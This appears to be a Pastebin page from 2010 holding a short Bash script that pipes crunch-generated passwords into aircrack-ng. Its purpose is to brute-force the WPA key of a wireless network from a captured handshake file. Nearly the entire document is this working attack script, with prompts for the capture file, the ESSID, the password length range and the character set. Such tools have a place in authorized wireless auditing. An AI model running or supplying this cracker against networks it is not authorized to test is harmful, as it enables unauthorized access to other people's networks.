Advertisement
Guest User

Crunch-to-Aircrack Passthrough

a guest
Jul 10th, 2010
5,093
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 1.37 KB | None | 0 0
  1. # crunch-to-aircrack passthrough
  2.  
  3. #!/bin/bash
  4.  
  5. # tells crunch to generate passwords within a user-defined range,
  6. # then pipes the output to aircrack-ng
  7.  
  8. # this saves a TON of disk-space and time and energy
  9.  
  10. ############################################################################
  11.  
  12. # path and filename of 'crunch' -- wordlist generator
  13. # can be found here: http://sourceforge.net/projects/crunch-wordlist/
  14. CRUNCH="/pentest/passwords/crunch/./crunch"
  15.  
  16. echo "!! Crunch-to-Aircrack passthrough script"
  17. echo ""
  18. echo "?? This script reads a cap file and certain ranges for passwords,"
  19. echo "     then runs 'crunch' to generate passwords in these ranges,"
  20. echo "     while piping the output to aircrack-ng"
  21. echo ""
  22. echo ":: Found passwords are saved to [CapFilename].txt."
  23. echo "   (eg. a cap file named 'wpa-01.cap' would be saved as 'wpa-01.txt')"
  24. echo ""
  25.  
  26. echo "-> Enter the filename of the .CAP file (without the .cap):"
  27. echo "   (eg. '/root/wpa-01.cap' would be '/root/wpa-01')"
  28. read CAP
  29.  
  30. echo ""
  31. echo "-> Enter the ESSID (name) of the access point:"
  32. echo "   (eg. NETGEAR)"
  33. read ESSID
  34.  
  35. echo ""
  36. echo "-> Enter minimum length (eg. 8):"
  37. read MIN
  38.  
  39. echo ""
  40. echo "-> Enter maximum length (eg. 63):"
  41. read MAX
  42.  
  43. echo ""
  44. echo "-> Enter letters to use (eg. 0123456789):"
  45. read CHARSET
  46.  
  47. ${CRUNCH} ${MIN} ${MAX} ${CHARSET} | aircrack-ng -w - -e ${ESSID} ${CAP}.cap
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement